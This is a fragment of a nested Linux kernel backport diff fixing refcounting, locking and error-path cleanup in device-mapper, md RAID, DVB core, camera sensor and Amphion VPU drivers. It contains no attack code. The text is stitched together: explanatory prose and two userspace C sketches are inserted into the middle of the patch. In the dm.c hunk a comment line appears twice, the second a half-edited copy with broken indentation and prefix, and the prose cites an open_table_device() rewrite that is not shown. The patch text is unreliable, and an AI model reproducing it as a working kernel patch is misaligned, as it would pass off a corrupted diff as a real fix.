+-		list_add(&td->list, &md->table_devices);
+ 	} else {
+ 		refcount_inc(&td->count);
+ 	}
+@@ -825,11 +828,8 @@ void dm_put_table_device(struct mapped_device *md, struct dm_dev *d)
+ 	struct table_device *td = container_of(d, struct table_device, dm_dev);
+ 
+ 	mutex_lock(&md->table_devices_lock);
+-	if (refcount_dec_and_test(&td->count)) {
++	if (refcount_dec_and_test(&td->count))
+ 		close_table_device(td, md);
+-		list_del(&td->list);
+-		kfree(td);
+-	}
+ 	mutex_unlock(&md->table_devices_lock);
+ }
+ 
+@@ -1972,8 +1972,21 @@ static void cleanup_mapped_device(struct mapped_device *md)
+ 		md->disk->private_data = NULL;
+ 		spin_unlock(&_minor_lock);
+ 		if (dm_get_md_type(md) != DM_TYPE_NONE) {
++			struct table_device *td;
++
+ 			dm_sysfs_exit(md);
++			list_for_each_entry(td, &md->table_devices, list) {
++				bd_unlink_disk_holder(td->dm_dev.bdev,
++						      md->disk);
++			}
++
++			/*
++			 * Hold lock to make sure del_gendisk() won't concurrent
++	 * Hold the lock to make sure del_gendisk() won't run concurrently
++			 */
++			mutex_lock(&md->table_devices_lock);
+ 			del_gendisk(md->disk);
++			mutex_unlock(&md->table_devices_lock);
+ 		}
+ 		dm_queue_destroy_crypto_profile(md->queue);
+ 		put_disk(md->disk);
+@@ -2305,6 +2318,7 @@ int dm_setup_md_queue(struct mapped_device *md, struct dm_table *t)
+ {
+ 	enum dm_queue_mode type = dm_table_get_type(t);
+ 	struct queue_limits limits;
++	struct table_device *td;
+ 	int r;
+ 
+ 	switch (type) {
+@@ -2333,17 +2347,40 @@ int dm_setup_md_queue(struct mapped_device *md, struct dm_table *t)
+ 	if (r)
+ 		return r;
+ 
++	/*
++	 * Hold the lock to make sure add_disk() and del_gendisk() won't run
++	 * concurrently with open_table_device() and close_table_device().
++	 */
++	mutex_lock(&md->table_devices_lock);
+ 	r = add_disk(md->disk);
++	mutex_unlock(&md->table_devices_lock);
+ 	if (r)
+ 		return r;
+ 
+-	r = dm_sysfs_init(md);
+-	if (r) {
+-		del_gendisk(md->disk);
+-		return r;
++	/*
++	 * Register the holder relationship for devices added before the disk
++	 * was live.
++	 */
++	list_for_each_entry(td, &md->table_devices, list) {
++		r = bd_link_disk_holder(td->dm_dev.bdev, md->disk);
++		if (r)
++			goto out_undo_holders;
+ 	}
++
++	r = dm_sysfs_init(md);
++	if (r)
++		goto out_undo_holders;
++
+ 	md->type = type;
+ 	return 0;
++
++out_undo_holders:
++	list_for_each_entry_continue_reverse(td, &md->table_devices, list)
++		bd_unlink_disk_holder(td->dm_dev.bdev, md->disk);
++	mutex_lock(&md->table_devices_lock);
++	del_gendisk(md->disk);
++	mutex_unlock(&md->table_devices_lock);
++	return r;
+ }
+ 
+ struct mapped_device *dm_get_md(dev_t dev)
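
open_table_device() is rewritten above in the usual constructor shape: allocate, acquire each resource in order, unwind with gotos in reverse order on failure, and return either the object or an encoded errno. A self-contained sketch of that shape; ERR_PTR/PTR_ERR/IS_ERR are simplified local stand-ins so it builds in userspace:

#include <errno.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>

/* Local stand-ins for the kernel's error-pointer helpers. */
#define ERR_PTR(err)	((void *)(intptr_t)(err))
#define PTR_ERR(ptr)	((int)(intptr_t)(ptr))
#define IS_ERR(ptr)	((uintptr_t)(ptr) >= (uintptr_t)-4095)

struct table_device {
	FILE *backing;
};

static struct table_device *open_table_device(const char *path)
{
	struct table_device *td;
	int r;

	td = malloc(sizeof(*td));
	if (!td)
		return ERR_PTR(-ENOMEM);

	td->backing = fopen(path, "r");
	if (!td->backing) {
		r = -errno;
		goto out_free_td;	/* unwind only what succeeded */
	}

	return td;

out_free_td:
	free(td);
	return ERR_PTR(r);
}

int main(void)
{
	struct table_device *td = open_table_device("/nonexistent");

	if (IS_ERR(td)) {
		printf("open failed: %d\n", PTR_ERR(td));
		return 1;
	}
	fclose(td->backing);
	free(td);
	return 0;
}
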
+diff --git a/drivers/md/md-bitmap.c b/drivers/md/md-bitmap.c
+index bf6dffadbe6f6..63ece30114e53 100644
+--- a/drivers/md/md-bitmap.c
++++ b/drivers/md/md-bitmap.c
+@@ -2195,20 +2195,23 @@ int md_bitmap_resize(struct bitmap *bitmap, sector_t blocks,
+ 
+ 		if (set) {
+ 			bmc_new = md_bitmap_get_counter(&bitmap->counts, block, &new_blocks, 1);
+-			if (*bmc_new == 0) {
+-				/* need to set on-disk bits too. */
+-				sector_t end = block + new_blocks;
+-				sector_t start = block >> chunkshift;
+-				start <<= chunkshift;
+-				while (start < end) {
+-					md_bitmap_file_set_bit(bitmap, block);
+-					start += 1 << chunkshift;
++			if (bmc_new) {
++				if (*bmc_new == 0) {
++					/* need to set on-disk bits too. */
++					sector_t end = block + new_blocks;
++					sector_t start = block >> chunkshift;
++
++					start <<= chunkshift;
++					while (start < end) {
++						md_bitmap_file_set_bit(bitmap, block);
++						start += 1 << chunkshift;
++					}
++					*bmc_new = 2;
++					md_bitmap_count_page(&bitmap->counts, block, 1);
++					md_bitmap_set_pending(&bitmap->counts, block);
+ 				}
+-				*bmc_new = 2;
+-				md_bitmap_count_page(&bitmap->counts, block, 1);
+-				md_bitmap_set_pending(&bitmap->counts, block);
++				*bmc_new |= NEEDED_MASK;
+ 			}
+-			*bmc_new |= NEEDED_MASK;
+ 			if (new_blocks < old_blocks)
+ 				old_blocks = new_blocks;
+ 		}
+diff --git a/drivers/md/raid0.c b/drivers/md/raid0.c
+index 857c49399c28e..b536befd88988 100644
+--- a/drivers/md/raid0.c
++++ b/drivers/md/raid0.c
+@@ -398,7 +398,6 @@ static int raid0_run(struct mddev *mddev)
+ 
+ 		blk_queue_max_hw_sectors(mddev->queue, mddev->chunk_sectors);
+ 		blk_queue_max_write_zeroes_sectors(mddev->queue, mddev->chunk_sectors);
+-		blk_queue_max_discard_sectors(mddev->queue, UINT_MAX);
+ 
+ 		blk_queue_io_min(mddev->queue, mddev->chunk_sectors << 9);
+ 		blk_queue_io_opt(mddev->queue,
+diff --git a/drivers/md/raid1.c b/drivers/md/raid1.c
+index 05d8438cfec88..58f705f429480 100644
+--- a/drivers/md/raid1.c
++++ b/drivers/md/raid1.c
+@@ -3159,6 +3159,7 @@ static int raid1_run(struct mddev *mddev)
+ 	 * RAID1 needs at least one disk in active
+ 	 */
+ 	if (conf->raid_disks - mddev->degraded < 1) {
++		md_unregister_thread(&conf->thread);
+ 		ret = -EINVAL;
+ 		goto abort;
+ 	}
+diff --git a/drivers/md/raid10.c b/drivers/md/raid10.c
+index 3aa8b6e11d585..9a6503f5cb982 100644
+--- a/drivers/md/raid10.c
++++ b/drivers/md/raid10.c
+@@ -4145,8 +4145,6 @@ static int raid10_run(struct mddev *mddev)
+ 	conf->thread = NULL;
+ 
+ 	if (mddev->queue) {
+-		blk_queue_max_discard_sectors(mddev->queue,
+-					      UINT_MAX);
+ 		blk_queue_max_write_zeroes_sectors(mddev->queue, 0);
+ 		blk_queue_io_min(mddev->queue, mddev->chunk_sectors << 9);
+ 		raid10_set_io_opt(conf);
+diff --git a/drivers/media/dvb-core/dvb_ca_en50221.c b/drivers/media/dvb-core/dvb_ca_en50221.c
+index 15a08d8c69ef8..c2d2792227f86 100644
+--- a/drivers/media/dvb-core/dvb_ca_en50221.c
++++ b/drivers/media/dvb-core/dvb_ca_en50221.c
+@@ -157,7 +157,7 @@ static void dvb_ca_private_free(struct dvb_ca_private *ca)
+ {
+ 	unsigned int i;
+ 
+-	dvb_free_device(ca->dvbdev);
++	dvb_device_put(ca->dvbdev);
+ 	for (i = 0; i < ca->slot_count; i++)
+ 		vfree(ca->slot_info[i].rx_buffer.data);
+ 
+diff --git a/drivers/media/dvb-core/dvb_frontend.c b/drivers/media/dvb-core/dvb_frontend.c
+index 48e735cdbe6bb..c41a7e5c2b928 100644
+--- a/drivers/media/dvb-core/dvb_frontend.c
++++ b/drivers/media/dvb-core/dvb_frontend.c
+@@ -136,7 +136,7 @@ static void __dvb_frontend_free(struct dvb_frontend *fe)
+ 	struct dvb_frontend_private *fepriv = fe->frontend_priv;
+ 
+ 	if (fepriv)
+-		dvb_free_device(fepriv->dvbdev);
++		dvb_device_put(fepriv->dvbdev);
+ 
+ 	dvb_frontend_invoke_release(fe, fe->ops.release);
+ 
+@@ -2986,6 +2986,7 @@ int dvb_register_frontend(struct dvb_adapter *dvb,
+ 		.name = fe->ops.info.name,
+ #endif
+ 	};
++	int ret;
+ 
+ 	dev_dbg(dvb->device, "%s:\n", __func__);
+ 
+@@ -3019,8 +3020,13 @@ int dvb_register_frontend(struct dvb_adapter *dvb,
+ 		 "DVB: registering adapter %i frontend %i (%s)...\n",
+ 		 fe->dvb->num, fe->id, fe->ops.info.name);
+ 
+-	dvb_register_device(fe->dvb, &fepriv->dvbdev, &dvbdev_template,
++	ret = dvb_register_device(fe->dvb, &fepriv->dvbdev, &dvbdev_template,
+ 			    fe, DVB_DEVICE_FRONTEND, 0);
++	if (ret) {
++		dvb_frontend_put(fe);
++		mutex_unlock(&frontend_mutex);
++		return ret;
++	}
+ 
+ 	/*
+ 	 * Initialize the cache to the proper values according with the
+diff --git a/drivers/media/dvb-core/dvbdev.c b/drivers/media/dvb-core/dvbdev.c
+index 675d877a67b25..9934728734af9 100644
+--- a/drivers/media/dvb-core/dvbdev.c
++++ b/drivers/media/dvb-core/dvbdev.c
+@@ -97,7 +97,7 @@ static int dvb_device_open(struct inode *inode, struct file *file)
+ 		new_fops = fops_get(dvbdev->fops);
+ 		if (!new_fops)
+ 			goto fail;
+-		file->private_data = dvbdev;
++		file->private_data = dvb_device_get(dvbdev);
+ 		replace_fops(file, new_fops);
+ 		if (file->f_op->open)
+ 			err = file->f_op->open(inode, file);
+@@ -161,6 +161,9 @@ int dvb_generic_release(struct inode *inode, struct file *file)
+ 	}
+ 
+ 	dvbdev->users++;
++
++	dvb_device_put(dvbdev);
++
+ 	return 0;
+ }
+ EXPORT_SYMBOL(dvb_generic_release);
+@@ -478,6 +481,7 @@ int dvb_register_device(struct dvb_adapter *adap, struct dvb_device **pdvbdev,
+ 	}
+ 
+ 	memcpy(dvbdev, template, sizeof(struct dvb_device));
++	kref_init(&dvbdev->ref);
+ 	dvbdev->type = type;
+ 	dvbdev->id = id;
+ 	dvbdev->adapter = adap;
+@@ -508,7 +512,7 @@ int dvb_register_device(struct dvb_adapter *adap, struct dvb_device **pdvbdev,
+ #endif
+ 
+ 	dvbdev->minor = minor;
+-	dvb_minors[minor] = dvbdev;
++	dvb_minors[minor] = dvb_device_get(dvbdev);
+ 	up_write(&minor_rwsem);
+ 
+ 	ret = dvb_register_media_device(dvbdev, type, minor, demux_sink_pads);
+@@ -553,6 +557,7 @@ void dvb_remove_device(struct dvb_device *dvbdev)
+ 
+ 	down_write(&minor_rwsem);
+ 	dvb_minors[dvbdev->minor] = NULL;
++	dvb_device_put(dvbdev);
+ 	up_write(&minor_rwsem);
+ 
+ 	dvb_media_device_free(dvbdev);
+@@ -564,21 +569,34 @@ void dvb_remove_device(struct dvb_device *dvbdev)
+ EXPORT_SYMBOL(dvb_remove_device);
+ 
+ 
+-void dvb_free_device(struct dvb_device *dvbdev)
++static void dvb_free_device(struct kref *ref)
+ {
+-	if (!dvbdev)
+-		return;
++	struct dvb_device *dvbdev = container_of(ref, struct dvb_device, ref);
+ 
+ 	kfree (dvbdev->fops);
+ 	kfree (dvbdev);
+ }
+-EXPORT_SYMBOL(dvb_free_device);
++
++
++struct dvb_device *dvb_device_get(struct dvb_device *dvbdev)
++{
++	kref_get(&dvbdev->ref);
++	return dvbdev;
++}
++EXPORT_SYMBOL(dvb_device_get);
++
++
++void dvb_device_put(struct dvb_device *dvbdev)
++{
++	if (dvbdev)
++		kref_put(&dvbdev->ref, dvb_free_device);
++}
+ 
+ 
+ void dvb_unregister_device(struct dvb_device *dvbdev)
+ {
+ 	dvb_remove_device(dvbdev);
+-	dvb_free_device(dvbdev);
++	dvb_device_put(dvbdev);
+ }
+ EXPORT_SYMBOL(dvb_unregister_device);
+ 
+diff --git a/drivers/media/dvb-frontends/bcm3510.c b/drivers/media/dvb-frontends/bcm3510.c
+index da0ff7b44da41..68b92b4419cff 100644
+--- a/drivers/media/dvb-frontends/bcm3510.c
++++ b/drivers/media/dvb-frontends/bcm3510.c
+@@ -649,6 +649,7 @@ static int bcm3510_download_firmware(struct dvb_frontend* fe)
+ 		deb_info("firmware chunk, addr: 0x%04x, len: 0x%04x, total length: 0x%04zx\n",addr,len,fw->size);
+ 		if ((ret = bcm3510_write_ram(st,addr,&b[i+4],len)) < 0) {
+ 			err("firmware download failed: %d\n",ret);
++			release_firmware(fw);
+ 			return ret;
+ 		}
+ 		i += 4 + len;
+diff --git a/drivers/media/i2c/ad5820.c b/drivers/media/i2c/ad5820.c
+index 516de278cc493..a12fedcc3a1ce 100644
+--- a/drivers/media/i2c/ad5820.c
++++ b/drivers/media/i2c/ad5820.c
+@@ -327,18 +327,18 @@ static int ad5820_probe(struct i2c_client *client,
+ 
+ 	ret = media_entity_pads_init(&coil->subdev.entity, 0, NULL);
+ 	if (ret < 0)
+-		goto cleanup2;
++		goto clean_mutex;
+ 
+ 	ret = v4l2_async_register_subdev(&coil->subdev);
+ 	if (ret < 0)
+-		goto cleanup;
++		goto clean_entity;
+ 
+ 	return ret;
+ 
+-cleanup2:
+-	mutex_destroy(&coil->power_lock);
+-cleanup:
++clean_entity:
+ 	media_entity_cleanup(&coil->subdev.entity);
++clean_mutex:
++	mutex_destroy(&coil->power_lock);
+ 	return ret;
+ }
+ 
+diff --git a/drivers/media/i2c/adv748x/adv748x-afe.c b/drivers/media/i2c/adv748x/adv748x-afe.c
+index 02eabe10ab970..00095c7762c24 100644
+--- a/drivers/media/i2c/adv748x/adv748x-afe.c
++++ b/drivers/media/i2c/adv748x/adv748x-afe.c
+@@ -521,6 +521,10 @@ int adv748x_afe_init(struct adv748x_afe *afe)
+ 		}
+ 	}
+ 
++	adv748x_afe_s_input(afe, afe->input);
++
++	adv_dbg(state, "AFE Default input set to %d\n", afe->input);
++
+ 	/* Entity pads and sinks are 0-indexed to match the pads */
+ 	for (i = ADV748X_AFE_SINK_AIN0; i <= ADV748X_AFE_SINK_AIN7; i++)
+ 		afe->pads[i].flags = MEDIA_PAD_FL_SINK;
+diff --git a/drivers/media/i2c/dw9768.c b/drivers/media/i2c/dw9768.c
+index 0f47ef015a1d3..83a3ee275bbe8 100644
+--- a/drivers/media/i2c/dw9768.c
++++ b/drivers/media/i2c/dw9768.c
+@@ -414,6 +414,7 @@ static int dw9768_probe(struct i2c_client *client)
+ {
+ 	struct device *dev = &client->dev;
+ 	struct dw9768 *dw9768;
++	bool full_power;
+ 	unsigned int i;
+ 	int ret;
+ 
+@@ -469,13 +470,23 @@ static int dw9768_probe(struct i2c_client *client)
+ 
+ 	dw9768->sd.entity.function = MEDIA_ENT_F_LENS;
+ 
++	/*
++	 * Figure out whether we're going to power up the device here. Generally
++	 * this is done if CONFIG_PM is disabled in a DT system or the device is
++	 * to be powered on in an ACPI system. Similarly for power off in
++	 * remove.
++	 */
+ 	pm_runtime_enable(dev);
+-	if (!pm_runtime_enabled(dev)) {
++	full_power = (is_acpi_node(dev_fwnode(dev)) &&
++		      acpi_dev_state_d0(dev)) ||
++		     (is_of_node(dev_fwnode(dev)) && !pm_runtime_enabled(dev));
++	if (full_power) {
+ 		ret = dw9768_runtime_resume(dev);
+ 		if (ret < 0) {
+ 			dev_err(dev, "failed to power on: %d\n", ret);
+ 			goto err_clean_entity;
+ 		}
++		pm_runtime_set_active(dev);
+ 	}
+ 
+ 	ret = v4l2_async_register_subdev(&dw9768->sd);
+@@ -484,14 +495,17 @@ static int dw9768_probe(struct i2c_client *client)
+ 		goto err_power_off;
+ 	}
+ 
++	pm_runtime_idle(dev);
++
+ 	return 0;
+ 
+ err_power_off:
+-	if (pm_runtime_enabled(dev))
+-		pm_runtime_disable(dev);
+-	else
++	if (full_power) {
+ 		dw9768_runtime_suspend(dev);
++		pm_runtime_set_suspended(dev);
++	}
+ err_clean_entity:
++	pm_runtime_disable(dev);
+ 	media_entity_cleanup(&dw9768->sd.entity);
+ err_free_handler:
+ 	v4l2_ctrl_handler_free(&dw9768->ctrls);
+@@ -503,14 +517,17 @@ static void dw9768_remove(struct i2c_client *client)
+ {
+ 	struct v4l2_subdev *sd = i2c_get_clientdata(client);
+ 	struct dw9768 *dw9768 = sd_to_dw9768(sd);
++	struct device *dev = &client->dev;
+ 
+ 	v4l2_async_unregister_subdev(&dw9768->sd);
+ 	v4l2_ctrl_handler_free(&dw9768->ctrls);
+ 	media_entity_cleanup(&dw9768->sd.entity);
+-	pm_runtime_disable(&client->dev);
+-	if (!pm_runtime_status_suspended(&client->dev))
+-		dw9768_runtime_suspend(&client->dev);
+-	pm_runtime_set_suspended(&client->dev);
++	if ((is_acpi_node(dev_fwnode(dev)) && acpi_dev_state_d0(dev)) ||
++	    (is_of_node(dev_fwnode(dev)) && !pm_runtime_enabled(dev))) {
++		dw9768_runtime_suspend(dev);
++		pm_runtime_set_suspended(dev);
++	}
++	pm_runtime_disable(dev);
+ }
+ 
+ static const struct of_device_id dw9768_of_table[] = {
+diff --git a/drivers/media/i2c/hi846.c b/drivers/media/i2c/hi846.c
+index c5b69823f257e..7c61873b71981 100644
+--- a/drivers/media/i2c/hi846.c
++++ b/drivers/media/i2c/hi846.c
+@@ -2008,22 +2008,24 @@ static int hi846_parse_dt(struct hi846 *hi846, struct device *dev)
+ 	    bus_cfg.bus.mipi_csi2.num_data_lanes != 4) {
+ 		dev_err(dev, "number of CSI2 data lanes %d is not supported",
+ 			bus_cfg.bus.mipi_csi2.num_data_lanes);
+-		v4l2_fwnode_endpoint_free(&bus_cfg);
+-		return -EINVAL;
++		ret = -EINVAL;
++		goto check_hwcfg_error;
+ 	}
+ 
+ 	hi846->nr_lanes = bus_cfg.bus.mipi_csi2.num_data_lanes;
+ 
+ 	if (!bus_cfg.nr_of_link_frequencies) {
+ 		dev_err(dev, "link-frequency property not found in DT\n");
+-		return -EINVAL;
++		ret = -EINVAL;
++		goto check_hwcfg_error;
+ 	}
+ 
+ 	/* Check that link frequences for all the modes are in device tree */
+ 	fq = hi846_check_link_freqs(hi846, &bus_cfg);
+ 	if (fq) {
+ 		dev_err(dev, "Link frequency of %lld is not supported\n", fq);
+-		return -EINVAL;
++		ret = -EINVAL;
++		goto check_hwcfg_error;
+ 	}
+ 
+ 	v4l2_fwnode_endpoint_free(&bus_cfg);
+@@ -2044,6 +2046,10 @@ static int hi846_parse_dt(struct hi846 *hi846, struct device *dev)
+ 	}
+ 
+ 	return 0;
++
++check_hwcfg_error:
++	v4l2_fwnode_endpoint_free(&bus_cfg);
++	return ret;
+ }
+ 
+ static int hi846_probe(struct i2c_client *client)
+diff --git a/drivers/media/i2c/mt9p031.c b/drivers/media/i2c/mt9p031.c
+index 45f7b5e52bc39..b69db6fc82618 100644
+--- a/drivers/media/i2c/mt9p031.c
++++ b/drivers/media/i2c/mt9p031.c
+@@ -702,7 +702,6 @@ static int mt9p031_init_cfg(struct v4l2_subdev *subdev,
+ 					     V4L2_SUBDEV_FORMAT_TRY;
+ 
+ 	crop = __mt9p031_get_pad_crop(mt9p031, sd_state, 0, which);
+-	v4l2_subdev_get_try_crop(subdev, sd_state, 0);
+ 	crop->left = MT9P031_COLUMN_START_DEF;
+ 	crop->top = MT9P031_ROW_START_DEF;
+ 	crop->width = MT9P031_WINDOW_WIDTH_DEF;
+diff --git a/drivers/media/i2c/ov5640.c b/drivers/media/i2c/ov5640.c
+index 2d740397a5d4d..3f6d715efa823 100644
+--- a/drivers/media/i2c/ov5640.c
++++ b/drivers/media/i2c/ov5640.c
+@@ -3817,7 +3817,8 @@ static int ov5640_probe(struct i2c_client *client)
+ 	sensor->current_mode =
+ 		&ov5640_mode_data[OV5640_MODE_VGA_640_480];
+ 	sensor->last_mode = sensor->current_mode;
+-	sensor->current_link_freq = OV5640_DEFAULT_LINK_FREQ;
++	sensor->current_link_freq =
++		ov5640_csi2_link_freqs[OV5640_DEFAULT_LINK_FREQ];
+ 
+ 	sensor->ae_target = 52;
+ 
+diff --git a/drivers/media/i2c/ov5648.c b/drivers/media/i2c/ov5648.c
+index 84604ea7bdf9e..17465fcf28e33 100644
+--- a/drivers/media/i2c/ov5648.c
++++ b/drivers/media/i2c/ov5648.c
+@@ -2597,6 +2597,7 @@ static void ov5648_remove(struct i2c_client *client)
+ 	v4l2_ctrl_handler_free(&sensor->ctrls.handler);
+ 	mutex_destroy(&sensor->mutex);
+ 	media_entity_cleanup(&subdev->entity);
++	v4l2_fwnode_endpoint_free(&sensor->endpoint);
+ }
+ 
+ static const struct dev_pm_ops ov5648_pm_ops = {
+diff --git a/drivers/media/pci/saa7164/saa7164-core.c b/drivers/media/pci/saa7164/saa7164-core.c
+index d5f32e3ff5441..754c8be1b6d8b 100644
+--- a/drivers/media/pci/saa7164/saa7164-core.c
++++ b/drivers/media/pci/saa7164/saa7164-core.c
+@@ -1259,7 +1259,7 @@ static int saa7164_initdev(struct pci_dev *pci_dev,
+ 
+ 	if (saa7164_dev_setup(dev) < 0) {
+ 		err = -EINVAL;
+-		goto fail_free;
++		goto fail_dev;
+ 	}
+ 
+ 	/* print pci info */
+@@ -1427,6 +1427,8 @@ fail_fw:
+ 
+ fail_irq:
+ 	saa7164_dev_unregister(dev);
++fail_dev:
++	pci_disable_device(pci_dev);
+ fail_free:
+ 	v4l2_device_unregister(&dev->v4l2_dev);
+ 	kfree(dev);
+diff --git a/drivers/media/pci/solo6x10/solo6x10-core.c b/drivers/media/pci/solo6x10/solo6x10-core.c
+index 4a546eeefe38f..6d87fbb0ee04a 100644
+--- a/drivers/media/pci/solo6x10/solo6x10-core.c
++++ b/drivers/media/pci/solo6x10/solo6x10-core.c
+@@ -420,6 +420,7 @@ static int solo_sysfs_init(struct solo_dev *solo_dev)
+ 		     solo_dev->nr_chans);
+ 
+ 	if (device_register(dev)) {
++		put_device(dev);
+ 		dev->parent = NULL;
+ 		return -ENOMEM;
+ 	}
+diff --git a/drivers/media/platform/amphion/vdec.c b/drivers/media/platform/amphion/vdec.c
+index feb75dc204de8..b27e6bed85f0f 100644
+--- a/drivers/media/platform/amphion/vdec.c
++++ b/drivers/media/platform/amphion/vdec.c
+@@ -286,6 +286,7 @@ static int vdec_g_fmt(struct file *file, void *fh, struct v4l2_format *f)
+ 	struct vpu_format *cur_fmt;
+ 	int i;
+ 
++	vpu_inst_lock(inst);
+ 	cur_fmt = vpu_get_format(inst, f->type);
+ 
+ 	pixmp->pixelformat = cur_fmt->pixfmt;
+@@ -303,6 +304,7 @@ static int vdec_g_fmt(struct file *file, void *fh, struct v4l2_format *f)
+ 	f->fmt.pix_mp.xfer_func = vdec->codec_info.transfer_chars;
+ 	f->fmt.pix_mp.ycbcr_enc = vdec->codec_info.matrix_coeffs;
+ 	f->fmt.pix_mp.quantization = vdec->codec_info.full_range;
++	vpu_inst_unlock(inst);
+ 
+ 	return 0;
+ }
+@@ -753,6 +755,9 @@ static bool vdec_check_source_change(struct vpu_inst *inst)
+ 	if (!inst->fh.m2m_ctx)
+ 		return false;
+ 
++	if (vdec->reset_codec)
++		return false;
++
+ 	if (!vb2_is_streaming(v4l2_m2m_get_dst_vq(inst->fh.m2m_ctx)))
+ 		return true;
+ 	fmt = vpu_helper_find_format(inst, inst->cap_format.type, vdec->codec_info.pixfmt);
+@@ -1088,7 +1093,8 @@ static void vdec_event_seq_hdr(struct vpu_inst *inst, struct vpu_dec_codec_info
+ 		vdec->seq_tag = vdec->codec_info.tag;
+ 		if (vdec->is_source_changed) {
+ 			vdec_update_state(inst, VPU_CODEC_STATE_DYAMIC_RESOLUTION_CHANGE, 0);
+-			vpu_notify_source_change(inst);
++			vdec->source_change++;
++			vdec_handle_resolution_change(inst);
+ 			vdec->is_source_changed = false;
+ 		}
+ 	}
+@@ -1335,6 +1341,8 @@ static void vdec_abort(struct vpu_inst *inst)
+ 		  vdec->decoded_frame_count,
+ 		  vdec->display_frame_count,
+ 		  vdec->sequence);
++	if (!vdec->seq_hdr_found)
++		vdec->reset_codec = true;
+ 	vdec->params.end_flag = 0;
+ 	vdec->drain = 0;
+ 	vdec->params.frame_count = 0;
+@@ -1342,6 +1350,7 @@ static void vdec_abort(struct vpu_inst *inst)
+ 	vdec->display_frame_count = 0;
+ 	vdec->sequence = 0;
+ 	vdec->aborting = false;
++	inst->extra_size = 0;
+ }
+ 
+ static void vdec_stop(struct vpu_inst *inst, bool free)
+@@ -1464,8 +1473,7 @@ static int vdec_start_session(struct vpu_inst *inst, u32 type)
+ 	}
+ 
+ 	if (V4L2_TYPE_IS_OUTPUT(type)) {
+-		if (inst->state == VPU_CODEC_STATE_SEEK)
+-			vdec_update_state(inst, vdec->state, 1);
++		vdec_update_state(inst, vdec->state, 1);
+ 		vdec->eos_received = 0;
+ 		vpu_process_output_buffer(inst);
+ 	} else {
+@@ -1629,6 +1637,7 @@ static int vdec_open(struct file *file)
+ 		return ret;
+ 
+ 	vdec->fixed_fmt = false;
++	vdec->state = VPU_CODEC_STATE_ACTIVE;
+ 	inst->min_buffer_cap = VDEC_MIN_BUFFER_CAP;
+ 	inst->min_buffer_out = VDEC_MIN_BUFFER_OUT;
+ 	vdec_init(file);
+diff --git a/drivers/media/platform/amphion/vpu.h b/drivers/media/platform/amphion/vpu.h
+index beac0309ca8d9..048c23c2bf4db 100644
+--- a/drivers/media/platform/amphion/vpu.h
++++ b/drivers/media/platform/amphion/vpu.h
+@@ -13,6 +13,7 @@
+ #include <linux/mailbox_controller.h>
+ #include <linux/kfifo.h>
+ 
++#define VPU_TIMEOUT_WAKEUP	msecs_to_jiffies(200)
+ #define VPU_TIMEOUT		msecs_to_jiffies(1000)
+ #define VPU_INST_NULL_ID	(-1L)
+ #define VPU_MSG_BUFFER_SIZE	(8192)
+diff --git a/drivers/media/platform/amphion/vpu_cmds.c b/drivers/media/platform/amphion/vpu_cmds.c
+index f4d7ca78a6212..fa581ba6bab2d 100644
+--- a/drivers/media/platform/amphion/vpu_cmds.c
++++ b/drivers/media/platform/amphion/vpu_cmds.c
+@@ -269,7 +269,7 @@ exit:
+ 	return flag;
+ }
+ 
+-static int sync_session_response(struct vpu_inst *inst, unsigned long key)
++static int sync_session_response(struct vpu_inst *inst, unsigned long key, long timeout, int try)
+ {
+ 	struct vpu_core *core;
+ 
+@@ -279,10 +279,12 @@ static int sync_session_response(struct vpu_inst *inst, unsigned long key)
+ 	core = inst->core;
+ 
+ 	call_void_vop(inst, wait_prepare);
+-	wait_event_timeout(core->ack_wq, check_is_responsed(inst, key), VPU_TIMEOUT);
++	wait_event_timeout(core->ack_wq, check_is_responsed(inst, key), timeout);
+ 	call_void_vop(inst, wait_finish);
+ 
+ 	if (!check_is_responsed(inst, key)) {
++		if (try)
++			return -EINVAL;
+ 		dev_err(inst->dev, "[%d] sync session timeout\n", inst->id);
+ 		set_bit(inst->id, &core->hang_mask);
+ 		mutex_lock(&inst->core->cmd_lock);
+@@ -294,6 +296,19 @@ static int sync_session_response(struct vpu_inst *inst, unsigned long key)
+ 	return 0;
+ }
+ 
++static void vpu_core_keep_active(struct vpu_core *core)
++{
++	struct vpu_rpc_event pkt;
++
++	memset(&pkt, 0, sizeof(pkt));
++	vpu_iface_pack_cmd(core, &pkt, 0, VPU_CMD_ID_NOOP, NULL);
++
++	dev_dbg(core->dev, "try to wake up\n");
++	mutex_lock(&core->cmd_lock);
++	vpu_cmd_send(core, &pkt);
++	mutex_unlock(&core->cmd_lock);
++}
++
+ static int vpu_session_send_cmd(struct vpu_inst *inst, u32 id, void *data)
+ {
+ 	unsigned long key;
+@@ -304,9 +319,25 @@ static int vpu_session_send_cmd(struct vpu_inst *inst, u32 id, void *data)
+ 		return -EINVAL;
+ 
+ 	ret = vpu_request_cmd(inst, id, data, &key, &sync);
+-	if (!ret && sync)
+-		ret = sync_session_response(inst, key);
++	if (ret)
++		goto exit;
++
++	/*
++	 * Workaround for a firmware issue:
++	 * the firmware should be woken up by a start or configure command,
++	 * but there is a very small chance that it fails to wake up.
++	 * In that case, try to wake the firmware again by sending a noop command.
++	 */
++	if (sync && (id == VPU_CMD_ID_CONFIGURE_CODEC || id == VPU_CMD_ID_START)) {
++		if (sync_session_response(inst, key, VPU_TIMEOUT_WAKEUP, 1))
++			vpu_core_keep_active(inst->core);
++		else
++			goto exit;
++	}
++
++	if (sync)
++		ret = sync_session_response(inst, key, VPU_TIMEOUT, 0);
+ 
++exit:
+ 	if (ret)
+ 		dev_err(inst->dev, "[%d] send cmd(0x%x) fail\n", inst->id, id);
+ 
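
The vpu_cmds change implements a two-stage wait: a short VPU_TIMEOUT_WAKEUP wait first, and if that expires, a VPU_CMD_ID_NOOP nudge before waiting out the full VPU_TIMEOUT. A toy single-threaded model of that retry-with-wakeup handshake, where the 'firmware' is simulated and only responds once nudged:

#include <stdbool.h>
#include <stdio.h>

/* Simulated firmware: it only posts a response once it has been woken. */
static bool fw_awake;
static bool responded;

static void fw_tick(void)
{
	if (fw_awake)
		responded = true;
}

static void send_noop(void)	/* stands in for the noop command */
{
	fw_awake = true;
}

/* Poll for a response for at most 'ticks' iterations. */
static bool wait_response(int ticks)
{
	while (ticks-- > 0) {
		fw_tick();
		if (responded)
			return true;
	}
	return false;
}

static int send_sync_cmd(void)
{
	responded = false;

	/* short first wait; on expiry, nudge the firmware with a noop */
	if (!wait_response(5)) {
		send_noop();
		if (!wait_response(100))	/* then the full timeout */
			return -1;
	}
	return 0;
}

int main(void)
{
	printf("cmd %s\n", send_sync_cmd() ? "timed out" : "completed");
	return 0;
}
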
